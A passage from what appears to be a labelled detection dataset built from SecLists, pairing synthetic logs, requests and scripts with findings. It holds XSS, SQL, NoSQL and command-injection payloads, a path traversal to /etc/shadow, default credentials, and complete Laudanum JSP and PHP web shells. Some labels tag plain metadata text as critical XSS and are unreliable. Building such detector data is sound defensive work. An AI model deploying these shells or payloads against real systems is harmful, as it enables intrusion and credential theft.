"%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_01631", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n{ $ne: 1 }", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "{ $ne: 1 }", "injection_type": "NoSQL"}}]} {"id": "seclists_01632", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, obfuscated, conditional comments, internet explorer</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, obfuscated, conditional comments, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_01633", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log pe", "injection_type": "XSS"}}]} {"id": "seclists_01634", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = %29", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%29", "injection_type": "SQL"}}]} {"id": "seclists_01635", "source": "seclists", "source_license": "MIT", "text": "password: myspace1\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "myspace1"}}]} {"id": "seclists_01636", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:H2O Project,admin,admin,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "H2O Project,admin,admin,"}}]} {"id": "seclists_01637", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \") or (\"a\"=\"a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\") or (\"a\"=\"a", "injection_type": "cmd"}}]} {"id": "seclists_01638", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><select onkeyup=\"alert(1)\" contenteditable>test</select></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<select onkeyup=\"alert(1)\" contenteditable>test</select>", "injection_type": "XSS"}}]} {"id": "seclists_01639", "source": "seclists", "source_license": "MIT", "text": "password: Oracle,OWNER,OWNER,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,OWNER,OWNER,"}}]} {"id": "seclists_01640", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: 1];a=eval;b=alert;a(b(17));//</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: 1];a=eval;b=alert;a(b(17));//", "injection_type": "XSS"}}]} {"id": "seclists_01641", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=phil\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "phil"}}]} {"id": "seclists_01642", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = a' or 'a' = 'a", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a' or 'a' = 'a", "injection_type": "SQL"}}]} {"id": "seclists_01643", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \";echo%20OFZRPB$((30%2B95))$(echo%20OFZRPB)OFZRPB//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\";echo%20OFZRPB$((30%2B95))$(echo%20OFZRPB)OFZRPB//", "injection_type": "cmd"}}]} {"id": "seclists_01644", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 1=1-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_01645", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_01646", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: LAYER</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: LAYER", "injection_type": "XSS"}}]} {"id": "seclists_01647", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<pre><!--#echo var=\"DATE_LOCAL\" --> </pre>\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<pre><!--#echo var=\"DATE_LOCAL\" --> </pre>", "injection_type": "SSI"}}]} {"id": "seclists_01648", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=);waitfor delay '0:0:__TIME__'-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ");waitfor delay '0:0:__TIME__'--", "injection_type": "SQL"}}]} {"id": "seclists_01649", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "injection_type": "XSS"}}]} {"id": "seclists_01650", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"|echo$IFSXSEOTZ$((78%2B18))$(echo$IFSXSEOTZ)XSEOTZ// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"|echo$IFSXSEOTZ$((78%2B18))$(echo$IFSXSEOTZ)XSEOTZ//", "injection_type": "cmd"}}]} {"id": "seclists_01651", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, injection, CRLF, obfuscated</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, injection, CRLF, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01652", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Silex Technology,root,<BLANK>,http://www.silexeurope.com/en/home/support/faq/usb-device-server.html#faq25\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Silex Technology,root,<BLANK>,http://www.silexeurope.com/en/home/support/faq/usb-device-server.html#faq25"}}]} {"id": "seclists_01653", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:daemon", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "daemon"}}]} {"id": "seclists_01654", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides a host lookup by ip address.\n*** Adapted from Laudanum dns.php by Jason Gillam <jgillam@secureideas.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n// ***************** Config entries below ***********************\n\n// IPs are enterable as individual addresses TODO: add CIDR support\n$allowedIPs = array(\"19.168.2.16\", \"192.168.1.100\");\n\n# *********** No editable content below this line **************\n\n$allowed = 0;\nforeach ($allowedIPs as $IP) {\n if ($_SERVER[\"REMOTE_ADDR\"] == $IP)\n $allowed = 1;\n}\n\nif ($allowed == 0) {\n header(\"HTTP/1.0 404 Not Found\");\n die();\n}\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Hostname by IP Lookup</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\n\n/* Initialize some variables we need again and again. */\n$query = isset($_POST['query']) ? $_POST['query'] : '';\n$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';\n?>\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum Host Lookup</title>\n <link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n\n <script type=\"text/javascript\">\n function init() {\n document.dns.query.focus();\n }\n </script>\n</head>\n<body onload=\"init()\">\n\n<h1>Host Lookup 0.1</h1>\n<form name=\"dns\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST\">\n<fieldset>\n <legend>Host Lookup:</legend>\n <p>IP:<input name=\"query\" type=\"text\">\n </select>\n <input type=\"submit\" value=\"Submit\">\n</fieldset>\n</form", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "host.php"}}]} {"id": "seclists_01655", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:tigger1", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tigger1"}}]} {"id": "seclists_01656", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#X000003C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X000003C", "injection_type": "cmd"}}]} {"id": "seclists_01657", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%7Cecho$IFSDNZMGO$((37%2B14))$(echo$IFSDNZMGO)DNZMGO%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho$IFSDNZMGO$((37%2B14))$(echo$IFSDNZMGO)DNZMGO%26", "injection_type": "cmd"}}]} {"id": "seclists_01658", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<youremail>%0d%0aCc:<youremail> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<youremail>%0d%0aCc:<youremail>", "injection_type": "cmd"}}]} {"id": "seclists_01659", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n'%20%26%26%20this.passwordzz.match(/.*/)//+%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20%26%26%20this.passwordzz.match(/.*/)//+%00", "injection_type": "NoSQL"}}]} {"id": "seclists_01660", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Cisco,<N/A>,Cisco router,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Cisco,<N/A>,Cisco router,"}}]} {"id": "seclists_01661", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%7Cecho$IFSRGNFOX$((20%2B17))$(echo$IFSRGNFOX)RGNFOX' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho$IFSRGNFOX$((20%2B17))$(echo$IFSRGNFOX)RGNFOX'", "injection_type": "cmd"}}]} {"id": "seclists_01662", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf -268435455", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "-268435455", "injection_type": "cmd"}}]} {"id": "seclists_01663", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></a>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></a>", "injection_type": "XSS"}}]} {"id": "seclists_01664", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><thead onkeyup=\"alert(1)\" contenteditable>test</thead></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<thead onkeyup=\"alert(1)\" contenteditable>test</thead>", "injection_type": "XSS"}}]} {"id": "seclists_01665", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=masterbate\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "masterbate"}}]} {"id": "seclists_01666", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"navigatorurl: code execution\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "navigatorurl: code execution", "injection_type": "XSS"}}]} {"id": "seclists_01667", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7Cecho$IFSPCVHGX$((0%2B12))$(echo$IFSPCVHGX)PCVHGX", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho$IFSPCVHGX$((0%2B12))$(echo$IFSPCVHGX)PCVHGX", "injection_type": "cmd"}}]} {"id": "seclists_01668", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><cite oncut=\"alert(1)\" contenteditable>test</cite></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<cite oncut=\"alert(1)\" contenteditable>test</cite>", "injection_type": "XSS"}}]} {"id": "seclists_01669", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<dt onmousedown=\"alert(1)\">test</dt> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dt onmousedown=\"alert(1)\">test</dt>", "injection_type": "XSS"}}]} {"id": "seclists_01670", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><noframes onbeforecut=\"alert(1)\" contenteditable>test</noframes></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noframes onbeforecut=\"alert(1)\" contenteditable>test</noframes>", "injection_type": "XSS"}}]} {"id": "seclists_01671", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Evade Regex Filter 3</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Evade Regex Filter 3", "injection_type": "XSS"}}]} {"id": "seclists_01672", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\ntrue, $where: '1 == 1'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "true, $where: '1 == 1'", "injection_type": "NoSQL"}}]} {"id": "seclists_01673", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Siemens Corp,system,system,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Siemens Corp,system,system,"}}]} {"id": "seclists_01674", "source": "seclists", "source_license": "MIT", "text": "<?php\n\nreturn null;", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "VtigerVulnPlugin.php"}}]} {"id": "seclists_01675", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:generals@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "generals"}}]} {"id": "seclists_01676", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code.", "injection_type": "XSS"}}]} {"id": "seclists_01677", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><dfn onmouseenter=\"alert(1)\">test</dfn></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dfn onmouseenter=\"alert(1)\">test</dfn>", "injection_type": "XSS"}}]} {"id": "seclists_01678", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01679", "source": "seclists", "source_license": "MIT", "text": "<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n\nif (request.getRemoteAddr() != \"4.4.4.4\") {\n\tresponse.sendError(HttpServletResponse.SC_NOT_FOUND)\n\treturn;\n}\n\n%>\n<HTML>\n<TITLE>Laudanum JSP Shell</TITLE>\n<BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\"><br/>\nIf you use this against a Windows box you may need to prefix your command with cmd.exe /c\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\nOutputStream os = p.getOutputStream();\nInputStream in = p.getInputStream();\nDataInputStream dis = new DataInputStream(in);\nString disr = dis.readLine();\nwhile ( disr != null ) {\nout.println(disr);\ndisr = dis.readLine();\n}\n}\n%>\n</pre>\n<hr/>\n<address>\nCopyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\nWritten by Tim Medin.<br/>\nGet the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n</address>\n</BODY></HTML>\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "jsp", "filename": "cmd.jsp"}}]} {"id": "seclists_01680", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%26%26echo$IFSHIGDVX$((46%2B84))$(echo$IFSHIGDVX)HIGDVX", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%26%26echo$IFSHIGDVX$((46%2B84))$(echo$IFSHIGDVX)HIGDVX", "injection_type": "cmd"}}]} {"id": "seclists_01681", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=| HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|", "injection_type": "SQL"}}]} {"id": "seclists_01682", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00", "injection_type": "cmd"}}]} {"id": "seclists_01683", "source": "seclists", "source_license": "MIT", "text": "filename=)print(`echo%20DLBCJS;echo%20$((58%2B85));echo%20DLBCJS;echo%20DLBCJS`)%3B%255C%255CDLBCJS", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")print(`echo%20DLBCJS;echo%20$((58%2B85));echo%20DLBCJS;echo%20DLBCJS`)%3B%255C%255CDLBCJS", "injection_type": "cmd"}}]} {"id": "seclists_01684", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: HTML Entities\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: HTML Entities", "injection_type": "XSS"}}]} {"id": "seclists_01685", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \")print(`echo%20UKYEKY\\necho%20$((70%2B74))\\necho%20UKYEKY\\necho%20UKYEKY`)%3B%25252523UKYEKY", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\")print(`echo%20UKYEKY\\necho%20$((70%2B74))\\necho%20UKYEKY\\necho%20UKYEKY`)%3B%25252523UKYEKY", "injection_type": "cmd"}}]} {"id": "seclists_01686", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><ins ondrop=alert(1) contenteditable>drop here</ins> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><ins ondrop=alert(1) contenteditable>drop here</ins>", "injection_type": "XSS"}}]} {"id": "seclists_01687", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Basic JS breaker variant 10 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Basic JS breaker variant 10", "injection_type": "XSS"}}]} {"id": "seclists_01688", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Embed Flash</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Embed Flash", "injection_type": "XSS"}}]} {"id": "seclists_01689", "source": "seclists", "source_license": "MIT", "text": "filename=\\x3c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x3c", "injection_type": "cmd"}}]} {"id": "seclists_01690", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' or userid like '%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or userid like '%", "injection_type": "SQL"}}]} {"id": "seclists_01691", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: OWASP</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: OWASP", "injection_type": "XSS"}}]} {"id": "seclists_01692", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;echo$IFSVBYBZW$((39%2B43))$(echo$IFSVBYBZW)VBYBZW%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo$IFSVBYBZW$((39%2B43))$(echo$IFSVBYBZW)VBYBZW%22", "injection_type": "cmd"}}]} {"id": "seclists_01693", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: URL string evasion (assuming \u201dhttp://www.google.com/\u201d is programmatically disallowed).</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: URL string evasion (assuming \u201dhttp://www.google.com/\u201d is programmatically disallowed).", "injection_type": "XSS"}}]} {"id": "seclists_01694", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x03c; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x03c;", "injection_type": "cmd"}}]} {"id": "seclists_01695", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: or%201=1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or%201=1", "injection_type": "cmd"}}]} {"id": "seclists_01696", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '&echo$IFSHDKHON$((74%2B41))$(echo$IFSHDKHON)HDKHON\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&echo$IFSHDKHON$((74%2B41))$(echo$IFSHDKHON)HDKHON\\", "injection_type": "cmd"}}]} {"id": "seclists_01697", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: kishor\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_01698", "source": "seclists", "source_license": "MIT", "text": "filename=\"&echo%20ILAWBP$((7%2B21))$(echo%20ILAWBP)ILAWBP%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"&echo%20ILAWBP$((7%2B21))$(echo%20ILAWBP)ILAWBP%22", "injection_type": "cmd"}}]} {"id": "seclists_01699", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><script>alert(1)</script></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": 